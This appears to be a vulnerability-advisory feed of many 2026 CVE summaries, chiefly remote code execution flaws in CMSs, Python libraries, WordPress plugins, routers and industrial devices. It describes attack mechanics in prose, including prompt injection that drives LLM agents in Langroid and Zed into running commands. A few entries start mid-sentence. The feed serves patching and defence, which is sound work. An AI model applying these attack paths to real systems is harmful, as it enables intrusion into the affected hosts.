Authenticated remote code execution in Concrete CMS 9.5.0 and earlier allows an administrator with composer form editing privileges to chain a path traversal flaw in the ptComposerFormLayoutSetControlCustomTemplate field with the platform's permissive file uploader to execute arbitrary PHP on the server. The vendor scored this 9.4 (CVSS v4.0), reflecting high confidentiality, integrity, and availability impact across both the vulnerable component and downstream systems. No public exploit identified at time of analysis, and the issue is not currently listed in CISA KEV.

PHP RCE Path Traversal LFI
NVD VulDB
CVSS 4.0
9.4
EPSS
0.4%
CVE-2026-46517 PyPI HIGH GHSA This Week

Unsafe default code execution in InternLM LMDeploy (<=0.12.3) lets a malicious Hugging Face model repository run arbitrary Python on the host whenever a user loads it through any LMDeploy CLI (serve, calibrate, gptq, awq). The library hardcodes transformers.AutoConfig.from_pretrained(..., trust_remote_code=True) in get_model_arch and related helpers with no flag, env var, or warning to opt out, overriding HF Transformers' default-secure stance. No public exploit identified at time of analysis, and exploitation requires the user to load an untrusted repo, so risk is hardening-level rather than network-reachable RCE.

RCE Python Code Injection
NVD GitHub
CVSS 3.1
7.8
CVE-2026-46497 PyPI LOW PATCH GHSA Monitor

Two-layer blind SSRF in Crawlee for Python (pip/crawlee >= 1.0.0, < 1.7.0) allows an attacker who controls a sitemap or robots.txt file to force the crawler to issue HTTP requests against internal network services (layer 1, all HTTP clients), and - when CurlImpersonateHttpClient is configured - to dispatch non-HTTP scheme requests including gopher://, file://, dict://, and ftp:// (layer 2). The layer 2 escalation enables canonical Redis exploitation via gopher://, making RCE on unauthenticated internal Redis instances achievable from a public-facing crawler. No public exploit code has been identified at time of analysis and this CVE is not listed in the CISA KEV catalog, but the researcher-credited advisory details a fully articulated attack path including Redis RCE.

RCE Python SSRF Redis Canonical
NVD GitHub
CVE-2026-46432 PyPI HIGH PATCH GHSA This Week

Arbitrary code execution in InternLM lmdeploy <= 0.12.3 occurs because trust_remote_code=True is hardcoded across HuggingFace model-loading call sites in lmdeploy/archs.py and lmdeploy/utils.py. An attacker who can influence the model_path passed to an lmdeploy serving process can point it at a malicious HuggingFace repository, causing Transformers to download and execute attacker-controlled Python code with the privileges of the serving daemon. Publicly available exploit code exists in the GHSA advisory, and an upstream fix has been merged via PR #4511 (fixed in 0.13.0).

RCE Denial Of Service Python Kubernetes Code Injection
NVD GitHub
CVSS 3.1
7.8
CVE-2026-46486 PyPI MEDIUM PATCH GHSA This Month

Path traversal in Mobile Verification Toolkit (MVT) pip/mvt versions through 2026.4.28 allows an adversary who delivers a crafted iOS backup to trigger arbitrary file writes or reads on the analyst's filesystem by embedding directory traversal sequences in fileID values within the backup's Manifest.db SQLite database. The decrypt-backup command can write attacker-controlled content to arbitrary writable paths - enabling shell profile modification or SSH key injection for code execution - while check-backup can read arbitrary host files into MVT's JSON and CSV forensic output. No public exploit has been identified at time of analysis; vendor-released patch v2026.5.12 is available.

RCE Path Traversal Apple
NVD GitHub
CVE-2026-2740 HIGH PATCH This Week

Authenticated remote code execution affects Zoho ManageEngine ADSelfService Plus (before build 6525), DataSecurity Plus (before 6264), and RecoveryManager Plus (before 6313) on agent machines, stemming from a flaw in a bundled third-party dependency. An authenticated attacker with low privileges can inject commands (CWE-77) to execute arbitrary code on managed agent endpoints, with no public exploit identified at time of analysis.

RCE Command Injection Zoho
NVD VulDB
CVSS 3.1
8.4
EPSS
1.2%
CVE-2026-42396 MEDIUM PATCH This Month

Catalog zone transfer failure in PowerDNS Authoritative can be triggered by a high-privileged remote attacker who injects insufficiently validated member zone data, causing the catalog zone transfer mechanism to abort and preventing secondary nameservers from receiving zone updates. The impact is a targeted denial-of-service against DNS zone replication infrastructure, affecting any deployment using catalog zones (RFC 9432). No public exploit has been identified at time of analysis, and the vulnerability is not listed in CISA KEV.

RCE Code Injection
NVD VulDB
CVSS 3.1
4.9
EPSS
0.0%
CVE-2026-45253 HIGH This Week

Local privilege escalation in FreeBSD via the ptrace(PT_SC_REMOTE) interface allows an unprivileged user with debug access to a process to trigger arbitrary kernel code execution by abusing improperly validated parameters in the syscall(2) and __syscall(2) meta-system calls. Affected releases include FreeBSD 14.3, 14.4, and 15.0 prior to their respective patch levels, and no public exploit has been identified at time of analysis. EPSS exploitation probability is low (0.02%), but the CVSS base score of 8.4 reflects high impact across confidentiality, integrity, and availability once a foothold exists.

RCE Buffer Overflow Memory Corruption
NVD VulDB
CVSS 3.1
8.4
EPSS
0.0%
CVSS 9.3
CRITICAL PATCH Act Now

Remote code execution in GitButler desktop application versions prior to 0.19.7 allows attackers to execute arbitrary scripts within the Tauri webview by injecting malicious links into pull request bodies. The flaw activates when a user with forge integration enabled clicks the crafted link, leading to full compromise of the desktop client context. No public exploit identified at time of analysis, though the GitHub Security Advisory GHSA-xpmj-536r-9fc6 publicly documents the issue.

RCE Code Injection Gitbutler
NVD GitHub
CVSS 8.6
HIGH PATCH This Week

Arbitrary code execution in the Zed code editor (versions prior to 0.229.0) is possible by abusing its terminal tool permission system, which fails to account for environment-variable prefixes on allowlisted commands. An attacker who can influence what the agent runs (for example via a malicious prompt or repository content) can prepend assignments such as PAGER=/path/to/payload to a permitted command and hijack execution. No public exploit identified at time of analysis, and the issue is not listed in CISA KEV.

RCE
NVD GitHub
CVSS 6.4
MEDIUM PATCH This Month

{var@P} prompt-string operator. Zed's terminal tool system enforces command-prefix allowlists to control what commands can be executed; the bypass exploits an incomplete input validation list (CWE-184) to chain expansions that resolve to arbitrary shell commands while appearing to match an approved prefix. No public exploit code has been identified at time of analysis, and the vulnerability is not listed in CISA KEV, though the RCE-tagged nature and CVSS High confidentiality impact make it a meaningful concern for users relying on Zed's agentic terminal tool permissions.

RCE
NVD GitHub
CVSS 8.6
HIGH PATCH This Week

Remote code execution in Zed code editor versions prior to 0.227.1 occurs when a user opens a folder containing a malicious .git/config file that abuses the core.fsmonitor Git configuration option. The flaw triggers even in untrusted mode, defeating the safety boundary users expect when opening unknown repositories. No public exploit has been identified at time of analysis, though the advisory is published by the vendor.

RCE Command Injection
NVD GitHub
CVSS 1.2
LOW Monitor

Security restriction bypass in logback-core's HardenedObjectInputStream allows limited object injection via logback's SimpleSocketServer and SimpleSSLSocketServer components, affecting all versions through 1.5.32 inclusive. An attacker who can influence serialized data submitted to these socket server endpoints can instantiate objects from java.lang and java.util classes not explicitly blocked by the hardened deserializer, circumventing its intended allowlist controls. The vendor and NVD both confirm no practical remote code execution or significant privilege escalation has been identified; the real-world impact is limited confidentiality and integrity exposure. No public exploit identified at time of analysis beyond E:P proof-of-concept maturity indicated in the CVSS vector. Not listed in CISA KEV.

RCE Deserialization
NVD
Awaiting Data

An issue in SMSGate sms-core<=2.1.13.6 allows a remote attacker to execute arbitrary code via the Cmpp7FDeliverRequestMessageCodec.java component.

RCE Java
NVD GitHub
CVSS 8.0
HIGH This Week

Remote code execution in Responsive FileManager 9.14.0 enables authenticated attackers to run arbitrary code on the underlying server by abusing the force_download.php component. The CWE-98 classification points to improper control of PHP file inclusion, and while no public exploit is identified at time of analysis, the high CVSS of 8.0 reflects full confidentiality, integrity, and availability impact once a target user interacts with the attacker-supplied input.

PHP RCE LFI
NVD
EPSS 0%
PATCH Awaiting Data

{get,set}_value The uvd/vce/vcn code accesses the IB at predefined offsets without checking that the IB is large enough. Check the bounds here. The caller is responsible for making sure it can handle arbitrary return values. Also make the idx a uint32_t to prevent overflows causing the condition to fail.

RCE Linux
NVD
EPSS 0% CVSS 8.8
HIGH This Week

Arbitrary file upload leading to remote code execution affects the GutenBee – Gutenberg Blocks WordPress plugin in all versions through 2.20.1, enabling authenticated users with Author role or higher to upload PHP files disguised with double extensions such as shell.json.php. The flaw stems from a permissive strpos() substring check in gutenbee_file_and_ext_json that allows attackers to bypass WordPress filetype validation and execute arbitrary PHP on the server. No public exploit is identified at time of analysis, and the issue is not listed in CISA KEV.

PHP WordPress RCE +1
NVD GitHub
EPSS 0% CVSS 8.8
HIGH This Week

Remote code execution in the Crawlomatic Multipage Scraper Post Generator plugin for WordPress (versions up to and including 2.7.2) allows authenticated users with author-level privileges to execute arbitrary PHP code on the server by abusing the 'callback_raw' or 'callback' shortcode attributes processed by the filter_content function. The flaw stems from passing attacker-controlled input directly to call_user_func() guarded only by is_callable(), which still permits dangerous PHP built-ins like system, shell_exec, exec, passthru, and assert. No public exploit identified at time of analysis, but Wordfence has published a detailed advisory and the shortcode sink is trivially reachable for any author-level account.

PHP WordPress RCE +1
NVD VulDB
EPSS 0% CVSS 9.0
CRITICAL PATCH Act Now

Remote code execution in Comet Backup server allows a tenant administrator to inject arbitrary code into the backup agent signing module via insufficient character filtering, ultimately running code with elevated privileges on the Comet server and on connected backup agent devices. The vendor advisory links the issue to the branding configuration path, and no public exploit has been identified at time of analysis. Combined with a Scope:Changed CVSS:3.1 score of 9.0, successful exploitation pivots from a single tenant context into the underlying server and downstream endpoints.

RCE Code Injection
NVD VulDB
EPSS 0% CVSS 9.4
CRITICAL Act Now

Remote code execution in Veeam Service Provider Console versions 9.0 through 9.2 allows authenticated remote attackers to execute arbitrary code on the server, per the CVSS 4.0 vector requiring low privileges (PR:L) over the network. With a CVSS score of 9.4 and a scope change indicating impact beyond the vulnerable component (SC:H/SI:H/SA:H), successful exploitation could compromise managed downstream customer environments. No public exploit identified at time of analysis, and the CVE is not listed in CISA KEV.

RCE Service Provider Console
NVD VulDB
Awaiting Data

An arbitrary file upload vulnerability in the pages/admin.uploadmapimg.php component of SourceBans Material Admin v1.1.6 allows attackers to execute arbitrary code via uploading a crafted image file.

PHP RCE File Upload +1
NVD GitHub
HIGH PATCH This Week

Arbitrary file write in the compliance-trestle Python library (versions 4.0.0-4.0.2 and any release below 3.12.2) lets an attacker who controls a referenced OSCAL artifact plant attacker-supplied content anywhere the trestle process can write. The HTTPSFetcher and SFTPFetcher cache layer builds the local cache file path directly from the URL path component, so when trestle imports a remote OSCAL profile whose href contains `../` traversal the fetched HTTP/SFTP response body escapes the .trestle cache directory; overwriting files such as /etc/cron.d entries, ~/.ssh/authorized_keys, or a module on sys.path turns the primitive into code execution. A reproducible public proof-of-concept exists in the GHSA advisory (GHSA-g3vg-vx23-3858); the flaw is not listed in CISA KEV and no CVSS or EPSS scoring is provided, but the maintainers have shipped fixes in 4.0.3 and 3.12.2.

RCE Python Path Traversal +2
NVD GitHub
CVSS 9.1
CRITICAL PATCH Act Now

Remote code execution in Yamcs (the open-source mission control framework, yamcs-core) before 5.12.7 lets an authenticated operator holding the ChangeMissionDatabase privilege overwrite a Python (Jython) algorithm via the Mission Database REST API and run arbitrary OS commands on the host. The Jython script engine is invoked without a sandbox, so injected algorithm text can import java.lang.Runtime and shell out. Publicly available exploit code exists (a full PoC is published in the GitHub Security Advisory), but the issue is not listed in CISA KEV and no public in-the-wild exploitation is identified.

RCE Python Java +2
NVD GitHub
CVSS 9.8
CRITICAL PATCH Act Now

Remote code execution in the Yamcs mission control framework (org.yamcs:yamcs-core, releases 4.7.3 through 5.12.6) lets a caller of the algorithm-override endpoint run arbitrary Java/OS code on the ground server. The Nashorn JavaScript engine that evaluates user-supplied algorithm text is created without a ClassFilter, so payloads can reach any Java class (e.g. java.lang.Runtime) and execute commands as the Yamcs process user; because the default install (no security.yaml) gives the built-in guest user superuser=true, the endpoint is reachable by an unauthenticated network attacker. A detailed working exploit is published in the GitHub Security Advisory (publicly available exploit code exists); the issue is not listed in CISA KEV and no EPSS score was provided in the input.

RCE Python Java +1
NVD GitHub
HIGH PATCH This Week

Unauthenticated PHP object deserialization affects Symfony's Monolog Bridge through the development-time `server:log` console command, which by default binds a TCP listener to 0.0.0.0:9911 and runs `unserialize(base64_decode())` on every received frame with no class allowlist, authentication, or integrity check. Any host that can reach port 9911 on a machine running `server:log` can submit attacker-controlled serialized payloads, producing at minimum an unauthenticated denial of service (a non-array value triggers a fatal type error) and potentially object injection or full remote code execution where usable gadget chains exist in the target's autoloaded classes. Affected versions are symfony/symfony and symfony/monolog-bridge below 5.4.52, 6.x below 6.4.40, and 7.x below 7.4.12; there is no public exploit identified at time of analysis and no CVSS, EPSS, or CISA KEV data is available.

PHP RCE Denial Of Service +1
NVD GitHub
EPSS 0% CVSS 8.8
HIGH PATCH This Week

Unauthorized OS command execution in Tanium Connect allows an attacker holding low-privilege authenticated access to run arbitrary commands on the host, achieving full compromise of confidentiality, integrity, and availability. The CVSS 8.8 (network vector, low complexity, low privileges, no user interaction) reflects an authenticated remote code execution issue rooted in command injection (CWE-78). No public exploit has been identified at time of analysis and the vulnerability is not listed in CISA KEV; EPSS data was not provided.

RCE Command Injection
NVD
PATCH Awaiting Data

Pre-NVD disclosure via oss-security: oss-security mailing list - 2026/05/21. Thread subjects from the list index:
Linux kernel: Dirty Frag variants — fix merged into netdev (Hyunwoo Kim <imv4bel@...il.com>)
Re: Linux kernel: Dirty Frag variants — fix merged into netdev (Solar Designer <solar@...nwall.com>)
Re: Linux kernel: Dirty Frag variants — fix merged into netdev (Hyunwoo Kim <imv4bel@...il.com>)
CVE-2026-47243: Kata Containers runtime-rs 3.30: virtiofsd symlink escape (Aurelien Bombo <aurelien.bombo@...rosoft.com>)
CVE-2026-46473: Authen::TOTP versions before 0.1.1 for Perl generate secrets using rand (Robert Rothenberg <rrwo@...nsec.org>)
Re: On the issue of MIME handlers that execute arbitrary code (e.

RCE Linux
NVD
CVSS 9.8
CRITICAL PATCH Act Now

Remote code execution in Langroid before 0.63.0 arises because its SQLChatAgent executes SQL text generated by an LLM, and that LLM is steerable through prompt injection — including indirect injection via data returned from the database into the model's context. When the agent connects with a database role holding code-execution or filesystem privileges, an attacker who shapes the agent's input can drive emission of dialect-specific primitives like PostgreSQL's COPY ... FROM PROGRAM to run OS commands on the database host. A full working proof-of-concept (Base64-smuggled COPY FROM PROGRAM running 'id') is published in the GitHub advisory; there is no entry in CISA KEV, so this reflects publicly available exploit code rather than confirmed active exploitation.

RCE Python Information Disclosure +2
NVD GitHub
EPSS 0% CVSS 9.8
CRITICAL PATCH Act Now

Unauthenticated remote code execution affects Pi.Alert, an open-source WiFi/LAN intruder detector with web-based service monitoring, in all versions prior to the 2026-05-07 release. The web configuration editor writes attacker-controlled content into pialert.conf, which the background scan daemon subsequently evaluates with Python's exec(), so injected statements run with the daemon's privileges. Because the product ships with web protection disabled by default, an attacker reaching the web interface needs no credentials, yielding a CVSS 9.8 critical flaw; no public exploit identified at time of analysis.

RCE Python Code Injection
NVD GitHub VulDB
EPSS 0% CVSS 9.8
CRITICAL PATCH Act Now

Unauthenticated remote code execution affects Pi.Alert, a Python-based Wi-Fi/LAN intruder detector, in all releases prior to the 2026-05-07 fix. The web UI's SaveConfigFile() endpoint writes attacker-supplied numeric configuration values such as SMTP_PORT into pialert.conf with no validation, and because that file is reloaded via Python's exec() by a background cron job every 3-5 minutes, injected Python executes at the OS level. On default installations (PIALERT_WEB_PROTECTION = False) no credentials are required, matching the CVSS 9.8 network/no-privilege rating; there is no public exploit identified at time of analysis and the CVE is not in CISA KEV, but trivial complexity and full CIA impact make it a high-priority patch.

RCE Python Code Injection
NVD GitHub VulDB
EPSS 1% CVSS 8.7
HIGH This Week

Remote code execution in RELATE LMS (the inducer/relate web courseware platform) stems from its Celery task queue being configured to accept and unpickle untrusted messages (CELERY_ACCEPT_CONTENT included "pickle"). Because the code-execution sandbox lacks network isolation, an authenticated student can reach the message broker and deliver a malicious pickle payload that the worker deserializes, yielding arbitrary command execution on the host. No public exploit identified at time of analysis; the issue is corrected in commit d66ba5659b459bf1ba56b7109b5f9ecf197cbefb.

RCE Deserialization
NVD GitHub
EPSS 0% CVSS 7.8
HIGH This Week

Local privilege escalation via command injection in Raynet rvia (RayVentory) 12.6.4392.49-amd64.deb allows authenticated local users to achieve arbitrary code execution by exploiting an improperly terminated find query the application uses to locate the Java runtime. The flaw is reachable through the getconfig command, the upload URL argument, and the oracle -o flag, and publicly available exploit code exists on GitHub although no active exploitation has been observed.

RCE Java Command Injection +1
NVD GitHub
EPSS 0% CVSS 7.8
HIGH This Week

Local arbitrary code execution in Raynet rvia 12.6 Update 8 and earlier lets a low-privileged local user inject operating-system commands through the application's Java search feature, which assembles a `find` command from an attacker-controlled path without properly terminating the search criteria (CWE-77 OS command injection). A working proof-of-concept exploit script is publicly available on GitHub (Wise-Security/CVE-2026-38945), and CISA's SSVC framework rates the technical impact as total, though it marks the issue as not automatable and requiring local access. No EPSS score and no CISA KEV listing were supplied, so there is no public exploit identified as actively exploited at time of analysis.

RCE Java Command Injection
NVD GitHub
CVSS 8.0
HIGH PATCH This Week

PHP object injection in Pimcore (packages pimcore/pimcore and admin-ui-classic-bundle) up to and including version 12.3.6 arises from six code paths calling unserialize() without the allowed_classes restriction on values read from database columns and filesystem files. An attacker who can already write to one of those sources - for example through SQL injection into the tmp_store, sites, or custom_layouts tables, or a file write to the WebDAV delete log - can plant a serialized PHP gadget chain that executes arbitrary code with web-server privileges once the data is deserialized. No public exploit identified at time of analysis (the vendor advisory documents only a conceptual PoC procedure), the CVE is not in CISA KEV, and EPSS is not provided; the issue is fixed in 12.3.7 and rated CVSS 8.0, with the High attack-complexity reflecting its dependence on a separate write primitive and a working gadget chain.

PHP RCE SQLi +1
NVD GitHub
EPSS 0% CVSS 7.5
HIGH This Week

Arbitrary file write in the Jenkins Credentials Binding Plugin (version 720.v3f6decef43ea_ and earlier) lets users who can supply file or zip-file credentials to a job write files to attacker-chosen paths on the node filesystem, escalating to remote code execution when Jenkins is configured to let a low-privileged user configure such credentials for a job running on the built-in node. The flaw stems from missing file-name sanitization on the file and zip credential types. Rated CVSS 7.5 with high attack complexity (AC:H); no public exploit identified at time of analysis and the issue is not in CISA KEV.

RCE Jenkins
NVD
EPSS 0% CVSS 7.3
HIGH This Week

Remote code execution in Dolibarr ERP/CRM versions 22.0.0 through 22.0.4 and 24.0.0-alpha allows network-based attackers to execute arbitrary PHP code via the commonobject.class.php component. The CVSS 7.3 (AV:N/AC:L/PR:N/UI:N) vector indicates no authentication or user interaction is required, though impact metrics are rated Low across CIA. No public exploit identified at time of analysis, and EPSS scoring is very low at 0.06% (18th percentile) despite the unauthenticated network attack surface.

PHP RCE Code Injection
NVD GitHub
EPSS 0% CVSS 7.3
HIGH This Week

Remote code execution in Dolibarr ERP/CRM versions 22.0.0 through 22.0.4 and 24.0.0-alpha stems from unsafe use of PHP's call_user_func_array() within the cron job class, enabling attackers to execute arbitrary PHP code on the application server. The vulnerability carries CVSS 7.3 with CWE-94 (Code Injection) classification, and while no public exploit is identified at time of analysis, a security researcher writeup referenced from NVD discusses a five-year history of related dol_eval issues in Dolibarr suggesting recurring weaknesses in this code area. EPSS probability is very low at 0.06% and SSVC reports no observed exploitation, but the issue is rated automatable with partial technical impact.

PHP RCE Code Injection
NVD GitHub
EPSS 0% CVSS 7.3
HIGH This Week

Code injection in Dolibarr ERP/CRM versions 22.0.0 through 22.0.4 and 24.0.0-alpha allows a remote, unauthenticated attacker to execute attacker-controlled PHP through the htdocs/core/actions_addupdatedelete.inc.php request handler (CWE-94). The CVSS vector (AV:N/AC:L/PR:N/UI:N) indicates a low-effort, network-reachable, no-authentication attack, though all impact metrics are rated Low (C:L/I:L/A:L), suggesting the executable surface is constrained rather than full system takeover. There is no public exploit code confirmed in the provided data and the issue is not in CISA KEV (no observed exploitation per SSVC), but a referenced research write-up and a GitHub Security Advisory exist, and SSVC rates the flaw as automatable.

PHP RCE Code Injection
NVD GitHub
EPSS 0% CVSS 8.8
HIGH This Week

Arbitrary code execution in IBM Aspera High-Speed Transfer Server and Endpoint (versions 3.7.4 through 4.4.7 Fix Pack 1) arises from a stack-based buffer overflow in the asperahttpd component. An authenticated user with network access can corrupt memory in this HTTP handling component to run code in the context of the service, fully compromising confidentiality, integrity, and availability (CVSS 8.8). No public exploit has been identified at time of analysis, and the CVE is not listed in CISA KEV; EPSS data was not provided.

RCE Buffer Overflow IBM +1
NVD
EPSS 0% CVSS 9.8
CRITICAL Act Now

Remote code execution and authentication bypass are possible in IBM Aspera High-Speed Transfer Server and High-Speed Transfer Endpoint (versions 3.7.4 through 4.4.7 Fix Pack 1) through a heap-based buffer overflow in the asperahttpd component. An unauthenticated network attacker can corrupt memory to crash the service (denial of service) and, in the worst case, hijack execution flow to run arbitrary code or bypass authentication. There is no public exploit identified at time of analysis and SSVC lists exploitation as none, but the CVSS 9.8 rating and 'Automatable: yes' assessment mark this as a high-priority patching target.

Authentication Bypass RCE Buffer Overflow +3
NVD
EPSS 0% CVSS 9.8
CRITICAL Act Now

Remote code execution in IBM Langflow OSS versions 1.0.0 through 1.9.1 lets unauthenticated network attackers run arbitrary code by abusing how the platform handles symbolic links while unpacking uploaded archives. Because extraction does not properly validate symlink targets, a crafted archive can write files outside the intended directory and ultimately achieve code execution on the host. The flaw carries a critical CVSS 9.8 (AV:N/AC:L/PR:N/UI:N) and is reachable without authentication or user interaction, though no public exploit is identified at time of analysis.

RCE Path Traversal IBM
NVD
EPSS 0% CVSS 7.3
HIGH This Week

Remote code execution in Tasmota firmware (v15.3.0.3 and all earlier releases) stems from an unbounded strcpy() into the fixed 40-byte jpg_task.boundary[40] buffer inside fetch_jpg() in the Scripter driver (xdrv_10_scripter.ino). A network attacker able to reach the device and trigger this code path can overflow the buffer and, per the vendor description, execute arbitrary code on the ESP-based device. Publicly available exploit code exists (a CVE-named GitHub repository), and CISA's SSVC framework rates exploitation as POC with the attack automatable; no active exploitation is confirmed.

RCE Buffer Overflow
NVD GitHub
EPSS 0% CVSS 7.3
HIGH This Week

Remote code execution in Tasmota firmware version 15.3.0.3 and earlier allows remote unauthenticated attackers to trigger a stack-based buffer overflow in the fetch_jpg() function of the xdrv_10_scripter.ino scripting driver. The flaw is exposed over the network with low complexity and no privileges required (CVSS 7.3 AV:N/AC:L/PR:N/UI:N), and a public proof-of-concept repository has been registered, though no public exploit code was identified in the references at time of analysis. EPSS probability is very low (0.05%, 15th percentile) and the issue is not listed in CISA KEV.

RCE Buffer Overflow Stack Overflow
NVD GitHub
EPSS 0% CVSS 7.3
HIGH This Week

Unauthenticated remote command injection in the Netis AC1200 Router (model NC21, firmware V4.0.1.4296) allows any LAN-resident attacker to execute arbitrary OS commands as the router's runtime user via a single HTTP POST to /cgi-bin/skk_set.cgi. The password and new_pwd_confirm parameters are concatenated into a shell invocation without sanitization, and exploitation requires no credentials. No public exploit is identified at time of analysis, though the disclosure repository documents the technique (base64-encoded backtick payloads), and EPSS scoring (0.21%) suggests limited broad exploitation pressure despite the trivial attack complexity.

RCE Command Injection
NVD GitHub
EPSS 0% CVSS 7.2
HIGH This Week

OS command injection in MB connect line / Helmholz mbNET and REX industrial remote-maintenance routers (mbNET.mini up to 3.0.2, REX200/250 and mbNET/mbNET.rokey up to 8.4.4, REX100 up to 3.0.2) lets a high-privilege authenticated user poison the device's configuration generator so that a tainted value is later passed unsanitized to a system execute call, producing arbitrary command execution with total loss of confidentiality, integrity and availability. The flaw was reported through CERT@VDE (advisory VDE-2026-054) and tracked as EUVD-2026-32151. There is no public exploit identified at time of analysis, EPSS is low (0.07%, 22nd percentile), and CISA's SSVC framework rates current exploitation as none.

RCE Command Injection
NVD
EPSS 0% CVSS 8.4
HIGH This Week

Code execution is possible on MB connect line industrial remote-maintenance routers - mbNET/mbNET.rokey, mbNET.mini, and the REX100/REX200/250 families - when a local attacker supplies a specially crafted configuration file on a USB stick that triggers a type-confusion flaw in the device's cfgparser, yielding total loss of confidentiality, integrity, and availability (CVSS 8.4). The flaw requires local/physical access to the device rather than network reach. There is no public exploit identified at time of analysis, and the EPSS score is very low (0.02%, 7th percentile), consistent with the SSVC assessment of no observed exploitation.

RCE
NVD
EPSS 0% CVSS 9.8
CRITICAL PATCH Act Now

Remote code execution in Synology BeeStation OS versions before 1.3.2-65648 stems from a classic buffer overflow in the AdminCenter component, the device's web-based management interface. The CVSS 3.1 vector (AV:N/AC:L/PR:N/UI:N) indicates a network-reachable flaw exploitable by unauthenticated attackers with low complexity and no user interaction, yielding full compromise of confidentiality, integrity, and availability (9.8 Critical). There is no public exploit identified at time of analysis, and the issue is not listed in CISA KEV, but the unauthenticated network-RCE profile on a consumer NAS device makes this a high-priority patch target.

RCE Buffer Overflow Synology
NVD
EPSS 0% CVSS 8.8
HIGH This Week

Remote code execution in the WPCode WordPress plugin (versions through 2.3.5) lets authenticated author-level users run arbitrary PHP on the server. Because the plugin registers its 'wpcode' custom post type without a dedicated capability_type, WordPress falls back to standard post capabilities, so any author can create and publish PHP snippet posts via the XML-RPC wp.newPost method, which are later passed to eval() when rendered through the [wpcode] shortcode. EPSS is modest at 0.44% (63rd percentile) and there is no public exploit identified at time of analysis, but the low privilege bar and full CIA impact make this a high-priority patch for any multi-author site.

PHP WordPress RCE +1
NVD
EPSS 0% CVSS 7.2
HIGH This Week

Remote code execution in the affiliate-toolkit WordPress plugin ("Multi-Network Affiliate & Amazon Product Display") affects versions up to and including 3.8.5, letting authenticated users with Editor-level access or higher run arbitrary PHP on the host. The flaw stems from the bundled BladeOne template engine's runString() method, which compiles attacker-supplied template content into PHP and executes it through eval() with no sanitization or sandboxing. There is no public exploit identified at time of analysis and EPSS sits at a low 0.24%, but the technical impact is total because a successful injection yields full server-side code execution.

PHP WordPress RCE +1
NVD
EPSS 0% CVSS 8.7
HIGH PATCH This Week

Arbitrary root code execution in Phoenix Contact PLCnext Control devices (all firmware before 2026.0.3) is reachable by an authenticated low-privileged Engineer user who installs APP packages from the PLCnext Store through the Web-based Management (WBM) interface. Because the device never verifies the integrity or signature of the downloaded app (CWE-347, tagged JWT Attack), a tampered package runs as root and can compromise the integrity and availability of the controller. No public exploit is identified at time of analysis and EPSS is low (0.06%, 18th percentile), but the flaw is network-reachable with low attack complexity and a vendor patch (2026.0.3) is available.

RCE Jwt Attack
NVD
EPSS 0% CVSS 7.5
HIGH This Week

Local File Inclusion in the Query Shortcode plugin for WordPress (all versions through 0.2.1) lets authenticated users with contributor-level access or higher coerce the shortcode handler into including and executing arbitrary .php files already present on the server. Because included files are run by the PHP interpreter, this can leak sensitive data, bypass access controls, and escalate to full remote code execution where an attacker can also place a .php file (e.g. via an upload feature). EPSS rates near-term exploitation probability very low (0.07%, 21st percentile) and there is no public exploit identified at time of analysis.

PHP WordPress RCE +2
NVD
EPSS 0% CVSS 7.3
HIGH PATCH This Week

Arbitrary Perl code execution in the IO::Compress distribution (all versions before 2.220) lets an attacker who controls the output glob string passed to the bundled File::GlobMapper run arbitrary Perl at the calling process's privilege. The output glob is wrapped in double quotes and later handed to Perl's eval STRING, so an embedded double quote escapes the string context and the trailing characters execute as code. This is rated CVSS 7.3 and tagged RCE/Code Injection; no public exploit was identified at time of analysis and EPSS is very low (0.03%), but a vendor patch (2.220) and the fixing commit are publicly available.

RCE Code Injection
NVD GitHub
EPSS 0% CVSS 8.8
HIGH PATCH This Week

OS command injection in Tanium Connect lets an authenticated, low-privileged user execute arbitrary commands on the underlying host, yielding full confidentiality, integrity, and availability compromise (CVSS 8.8). The flaw affects Connect branches 5.26, 5.29, and 5.37 below their respective fixed builds and is tagged as RCE/Command Injection. There is no public exploit identified at time of analysis, and EPSS estimates exploitation probability at a low 0.07% (22nd percentile).

RCE Command Injection
NVD
EPSS 0% CVSS 7.4
HIGH This Week

Arbitrary code execution in GDAL 3.1.0 through 3.13.0 is reachable through the netCDF driver, where scanForGeometryContainers (frmts/netcdf/netcdfsg.cpp) copies a CF-convention geometry attribute into a fixed-size stack buffer without checking its length. Any service or workflow that feeds attacker-supplied NetCDF files to GDAL can be coerced into overflowing the stack and running attacker code in the process context. No public exploit is identified at time of analysis and EPSS is just 0.01% (3rd percentile), yet the issue carries a CVSS of 7.4 because the outcome is full remote code execution on the host.

RCE Buffer Overflow Stack Overflow
NVD GitHub
CVSS 9.1
CRITICAL PATCH Act Now

Remote code execution in Yamcs (Yet Another Mission Control System) versions before 5.12.7 allows an authenticated user holding the ChangeMissionDatabase privilege to run arbitrary OS commands on the server host. The flaw lives in the JavaExprAlgorithmExecutionFactory, which dynamically compiles user-supplied algorithm text with the Janino compiler without any sandbox or restrictive ClassLoader, so injected Java (e.g. java.lang.Runtime.exec) executes with the privileges of the Yamcs process. A detailed proof-of-concept exploit using a REST PATCH to override an existing algorithm is publicly available in the vendor advisory; the issue is not listed in CISA KEV.

RCE Java Code Injection
NVD GitHub
HIGH PATCH This Week

Arbitrary method call in Kirby CMS (versions ≤ 4.9.0 and 5.0.0–5.4.0) lets attackers in the pool of authenticated Panel users invoke unintended PHP model methods by abusing REST API search and collection-query parameters such as filter, sort, not, group, pluck, and findBy. Because Kirby did not validate which model attributes a query could reference, an attacker can reach sensitive methods like password() to leak password hashes, root() to disclose absolute server filesystem paths, loginPasswordless() to escalate into another user's account, or delete() to mass-delete queried models. No CVSS score, EPSS probability, or CISA KEV listing is provided in the source data, and no public exploit is identified at time of analysis, though the vendor rates the real-world impact as high.

Privilege Escalation RCE Information Disclosure
NVD GitHub
HIGH PATCH This Week

Unauthenticated remote code execution in FUXA 1.3.0 (the fuxa-server npm package) lets any network-reachable attacker run arbitrary OS commands on the SCADA/HMI host when secureEnabled is true. The POST /api/runscript endpoint authorizes a request against a stored script's permission, but with test:true it instead compiles and runs attacker-supplied code via Node's Module._compile, so a guest who knows a valid script ID and name (leaked via the unauthenticated GET /api/project endpoint) can execute code with full Node runtime access. Publicly available exploit code exists in the vendor advisory; no CVSS, EPSS, or CISA KEV data is provided.

Authentication Bypass RCE Information Disclosure +1
NVD GitHub
HIGH PATCH This Week

